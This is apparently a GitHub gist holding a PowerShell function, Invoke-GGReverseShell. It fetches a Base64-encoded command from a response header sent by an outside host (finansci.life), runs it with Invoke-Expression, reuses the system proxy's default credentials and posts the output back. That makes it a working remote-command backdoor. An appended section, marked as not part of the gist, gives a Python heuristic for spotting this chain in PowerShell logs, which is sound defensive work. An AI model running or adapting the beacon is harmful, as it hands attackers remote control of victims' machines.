@uceka
Created November 5, 2019 13:13
function Invoke-GGReverseShell
{
$url = "http://finansci.life/p"
# handle proxies and used default creds if needed
$req = [System.Net.HttpWebRequest]::Create($url);
$proxy=[System.Net.WebRequest]::GetSystemWebProxy();
$proxy.Credentials=[System.Net.CredentialCache]::DefaultCredentials;
$req.proxy = $proxy
# add our header
$req.Headers.add('CMD','INITIAL')
$res = $req.GetResponse();
$x = $res.GetResponseHeader("CMD");
# decode base64
$d = [System.Convert]::FromBase64String($x);
$Ds = [System.Text.Encoding]::UTF8.GetString($d);
# exec whatever we gave it (can be powershell or just shell commands)
$result = invoke-expression $Ds;
$b = [System.Text.Encoding]::UTF8.GetBytes($result);
$hackgg = [System.Convert]::ToBase64String($b);
$res.Close();
$req = [System.Net.HttpWebRequest]::Create($url);
$proxy=[System.Net.WebRequest]::GetSystemWebProxy();
$proxy.Credentials=[System.Net.CredentialCache]::DefaultCredentials;
$req.proxy = $proxy
$req.Method = 'POST';
$Stream = $req.GetRequestStream();
$Stream.Write($b, 0, $b.Length);
$req.GetResponse();
}
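
A defender-side view of the function above, as an added example that is not part of the original gist: a Python heuristic that scores PowerShell Script Block Logging text (event ID 4104) for the fetch header, Base64-decode, Invoke-Expression chain this code uses. The trait names, the three-level verdict, and both sample script blocks are assumptions constructed for illustration.

```python
import re

# Traits of the function above as they would appear in Script Block Logging
# text (event ID 4104). PowerShell is case-insensitive, so matching is too.
TRAITS = {
    "web_request":   r"\[System\.Net\.(Http)?WebRequest\]::Create",
    "header_read":   r"\.GetResponseHeader\(",
    "base64_decode": r"\[(System\.)?Convert\]::FromBase64String",
    "dynamic_exec":  r"\b(invoke-expression|iex)\b",
    "proxy_creds":   r"GetSystemWebProxy\(\)[\s\S]*DefaultCredentials",
    "post_back":     r"\.Method\s*=\s*['\"]POST['\"][\s\S]*GetRequestStream\(",
}
# Header value -> Base64 decode -> dynamic execution is the command channel.
CORE = {"header_read", "base64_decode", "dynamic_exec"}

def find_traits(script_block):
    """Return the names of all traits present in one logged script block."""
    return {n for n, rx in TRAITS.items() if re.search(rx, script_block, re.I)}

def classify(script_block):
    """'alert' for the full fetch/decode/execute chain, 'review' for decode
    plus execute without the web request, 'ok' otherwise."""
    hits = find_traits(script_block)
    if CORE <= hits and "web_request" in hits:
        return "alert"
    if {"base64_decode", "dynamic_exec"} <= hits:
        return "review"
    return "ok"

# Constructed samples (not real log data); hosts are placeholders.
SAMPLE_BEACON = """
$req = [System.Net.HttpWebRequest]::Create("http://c2.example/p")
$res = $req.GetResponse(); $x = $res.GetResponseHeader("CMD")
$Ds = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($x))
$result = Invoke-Expression $Ds
"""
SAMPLE_BENIGN = """
$req = [System.Net.HttpWebRequest]::Create("https://intranet.example/config")
$res = $req.GetResponse(); $etag = $res.GetResponseHeader("ETag"); $res.Close()
"""

if __name__ == "__main__":
    for name, text in (("beacon", SAMPLE_BEACON), ("benign", SAMPLE_BENIGN)):
        print(name, classify(text), sorted(find_traits(text)))
```

The proxy_creds and post_back traits do not change the verdict; they are reported by find_traits as supporting context for triage.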